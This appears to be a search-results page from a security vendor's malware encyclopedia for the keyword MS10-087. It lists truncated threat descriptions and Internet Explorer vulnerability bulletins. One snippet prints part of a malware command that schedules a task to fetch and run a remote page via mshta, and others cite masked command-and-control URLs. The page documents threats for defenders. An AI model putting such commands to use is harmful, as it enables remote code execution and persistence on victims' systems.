Search
Keyword: MS10-087
This backdoor arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. It executes commands from a remote malicious user,
Search and Download MS Office documents (doc, docx, xls, xlsx) It connects to the following URL(s) to send and receive commands from a remote malicious user: http://{BLOCKED}.{BLOCKED}.241.141/v1 http://
\CrucialSoft Ltd %User Profile%\CrucialSoft Ltd\MS AntiSpyware 2009 (Note: %User Profile% is the current user's profile folder, which is usually C:\Documents and Settings\{user name} on Windows 2000, XP, and
\CrucialSoft Ltd %User Profile%\CrucialSoft Ltd\MS AntiSpyware 2009 (Note: %User Profile% is the current user's profile folder, which is usually C:\Documents and Settings\{user name} on Windows 2000, XP, and
{current or malware path}\SystemInfoConfig\node_modules\socket.io-client\node_modules\ms {current or malware path}\SystemInfoConfig\node_modules\socket.io-client\node_modules\object-component {current or
file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. Installation This Trojan adds the following processes: %Application Data%\MS WM Player
This Trojan arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. It modifies files, disabling programs and applications
This worm may be downloaded from remote sites by other malware. It may arrive via peer-to-peer network shares. It may be downloaded unknowingly by a user when visiting malicious Web sites. It arrives
This backdoor arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. It executes commands from a remote malicious user,
This malware is dropped by TROJ_SMALL.WZ on specific folders. The malware performs the following specific routines if it detects that it is loaded by sysprep.EXE : The malware sends DNS TXT queries
This backdoor arrives as an attachment to email messages spammed by other malware/grayware or malicious users. It arrives on a system as a file dropped by other malware or as a file downloaded
This Trojan arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. It executes then deletes itself afterward. It connects
/tr "cmd.exe /c mshta http://w.{BLOCKED}h.com/page.html?p{Computer Name}"&schtasks /run /TN Autocheck) net start Ddriver for /f %i in (\'tasklist ^| find /c /i "cmd.exe"\') do set s=%i if gtr 10
CVE-2014-6368 This security update resolves fourteen privately reported vulnerabilities in Internet Explorer. The most severe of these vulnerabilities could allow remote code execution if a user
CVE-2015-1729,CVE-2015-1733,CVE-2015-1767,CVE-2015-2384,CVE-2015-2385,CVE-2015-2390,CVE-2015-2391,CVE-2015-2397,CVE-2015-2398,CVE
This Trojan arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. It modifies files, disabling programs and applications
This Trojan arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. Arrival Details This Trojan arrives on a system as a
This spyware searches the local drive of an infected system for MS Word and MS Excel documents. The collected documents are then archived and saved. It then uploads the created archive to the
This Trojan arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. Arrival Details This Trojan arrives on a system as a
This hacking tool exploits MS03-039 in order allow a remote user to open a command shell to a target PC, thus, the remote user may then execute malicious commands on the system. This hacking tool may